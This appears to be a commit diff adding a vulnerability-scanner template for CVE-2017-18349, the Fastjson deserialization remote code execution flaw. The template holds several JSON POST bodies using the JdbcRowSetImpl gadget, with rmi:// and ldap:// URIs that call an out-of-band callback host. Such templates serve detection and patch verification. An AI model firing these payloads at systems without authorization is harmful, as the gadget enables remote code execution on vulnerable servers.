Added CVE-2017-18349 template

http/cves/2017/CVE-2017-18349.yaml

@@ -0,0 +1,168 @@
+id: CVE-2017-18349
+
+info:
+  name: Fastjson Insecure Deserialization - Remote Code Execution
+  author: night
+  severity: critical
+  description: |
+    parseObject in Fastjson before 1.2.25, as used in FastjsonEngine in Pippo 1.11.0 and other products, allows remote attackers to execute arbitrary code via a crafted JSON request, as demonstrated by a crafted rmi-// URI in the dataSourceName field of HTTP POST data to the Pippo /json URI, which is mishandled in AjaxApplication.java.
+  impact: |
+    Successful exploitation allows complete system compromise through remote code execution, enabling attackers to execute arbitrary commands, access sensitive data, and establish persistent backdoors on the target system.
+  remediation: |
+    Update Fastjson to version 1.2.25 or later which includes security patches for this vulnerability.Disable autotype functionality by setting `fastjson.parser.autoTypeSupport=false`.Implement strict whitelist filtering for `@type` annotations, validate and sanitize all JSON input.Use Web Application Firewalls (WAF) to filter malicious requests, and regularly audit dependencies for known vulnerabilities. Consider migrating to safer JSON parsing libraries like Jackson with secure configurations.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2017-18349
+    - https://github.com/alibaba/fastjson/wiki/security_update_20170315
+    - https://github.com/pippo-java/pippo/issues/466
+    - https://github.com/h0cksr/Fastjson--CVE-2017-18349-
+    - https://fortiguard.com/encyclopedia/ips/44059
+    - https://www.exploit-db.com/exploits/45983
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2017-18349
+    cwe-id: CWE-20
+    epss-score: 0.7075
+    epss-percentile: 0.98594
+    cpe: cpe:2.3:a:alibaba:fastjson:*:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    vendor: alibaba
+    product: fastjson
+  tags: cve,cve2017,fastjson,deserialization,rce,oob,oast
+
+variables:
+  rmi_payload: "rmi://{{interactsh-url}}/{{randstr}}"
+  ldap_payload: "ldap://{{interactsh-url}}/{{randstr}}"
+
+http:
+  - method: POST
+    path:
+      - "{{BaseURL}}/json"
+      - "{{BaseURL}}/api/json"
+
+    headers:
+      Content-Type: application/json
+      Accept: application/json
+
+    body: |
+      {
+        "@type": "com.sun.rowset.JdbcRowSetImpl",
+        "dataSourceName": "{{rmi_payload}}",
+        "autoCommit": true
+      }
+
+    stop-at-first-match: true
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "contains(interactsh_protocol,'dns')"
+          - "contains(content_type, 'application/json')"
+          - "contains_all(body, 'autoCommit','set property error')"
+        condition: and
+
+    extractors:
+      - type: kval
+        kval:
+          - interactsh_ip
+
+  - method: POST
+    path:
+      - "{{BaseURL}}/json"
+      - "{{BaseURL}}/api/json"
+      - "{{BaseURL}}/parse"
+      - "{{BaseURL}}/deserialize"
+
+    headers:
+      Content-Type: application/json
+      Accept: application/json
+
+    body: |
+      {
+        "@type": "com.sun.rowset.JdbcRowSetImpl",
+        "dataSourceName": "{{ldap_payload}}",
+        "autoCommit": true
+      }
+
+    stop-at-first-match: true
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "contains(interactsh_protocol,'dns')"
+          - "contains(content_type, 'application/json')"
+          - "contains_all(body, 'autoCommit','set property error')"
+        condition: and
+
+    extractors:
+      - type: kval
+        kval:
+          - interactsh_ip
+
+  - method: POST
+    path:
+      - "{{BaseURL}}/json"
+      - "{{BaseURL}}/api/json"
+      - "{{BaseURL}}/parse"
+      - "{{BaseURL}}/deserialize"
+
+    headers:
+      Content-Type: application/json
+      Accept: application/json
+
+    body: |
+      {
+        "data": {
+          "@type": "com.sun.rowset.JdbcRowSetImpl",
+          "dataSourceName": "{{rmi_payload}}",
+          "autoCommit": true
+        }
+      }
+
+    stop-at-first-match: true
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "contains(interactsh_protocol,'dns')"
+          - "contains(content_type, 'application/json')"
+          - "contains_all(body, 'autoCommit','set property error')"
+        condition: and
+
+    extractors:
+      - type: kval
+        kval:
+          - interactsh_ip
+
+  - method: POST
+    path:
+      - "{{BaseURL}}/json"
+
+    headers:
+      Content-Type: application/json
+      Accept: application/json
+
+    body: |
+      {
+        "b": {
+          "@type": "com.sun.rowset.JdbcRowSetImpl",
+          "dataSourceName": "{{ldap_payload}}",
+          "autoCommit": true
+        }
+      }
+
+    stop-at-first-match: true
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "contains(interactsh_protocol,'dns')"
+          - "contains(content_type, 'application/json')"
+          - "contains_all(body, 'autoCommit','set property error')"
+        condition: and
+
+    extractors:
+      - type: kval
+        kval:
+          - interactsh_ip